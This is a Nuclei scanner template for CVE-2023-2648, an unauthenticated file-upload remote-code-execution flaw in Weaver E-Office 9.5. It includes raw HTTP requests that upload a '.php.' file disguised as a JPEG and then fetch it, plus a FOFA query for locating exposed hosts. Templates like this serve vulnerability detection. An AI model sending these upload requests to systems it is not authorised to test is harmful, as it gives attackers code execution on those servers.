id: CVE-2023-2648 info: name: Weaver E-Office 9.5 - Remote Code Execution author: ritikchaddha severity: critical description: | A vulnerability was found in Weaver E-Office 9.5. It has been classified as critical. This affects an unknown part of the file /inc/jquery/uploadify/uploadify.php. The manipulation of the argument Filedata leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-228777 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. remediation: | Apply the latest security patch or upgrade to a patched version of Weaver E-Office. reference: - https://github.com/sunyixuan1228/cve/blob/main/weaver.md - https://nvd.nist.gov/vuln/detail/CVE-2023-2648 - https://vuldb.com/?ctiid.228777 - https://vuldb.com/?id.228777 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-2648 cwe-id: CWE-434 epss-score: 0.03783 epss-percentile: 0.90825 cpe: cpe:2.3:a:weaver:e-office:9.5:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: weaver product: e-office fofa-query: app="泛微-EOffice" tags: cve,cve2023,weaver,eoffice,ecology,fileupload,rce,intrusive variables: file: '{{rand_base(5, "abc")}}' http: - raw: - | POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt Content-Disposition: form-data; name="Filedata"; filename="{{file}}.php." Content-Type: image/jpeg ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt - | POST /attachment/{{name}}/{{file}}.php HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body_2 words: - "747711c62dffae7dbf726d8241bd07fe" - type: status part: body_2 status: - 200 extractors: - type: regex name: name part: body group: 1 regex: - "([0-9]+)" internal: true # digest: 4a0a00473045022100f91a9ef3ef69b2ee35aeb6263a000eeee683a420bfb95dd206f23b08dd388f0b02203abbe99072ff2b3e31c7625592d65098139fd3d8cc2e73fdfe6f381fb89b4b4e:922c64590222798bb761d5b6d8e72950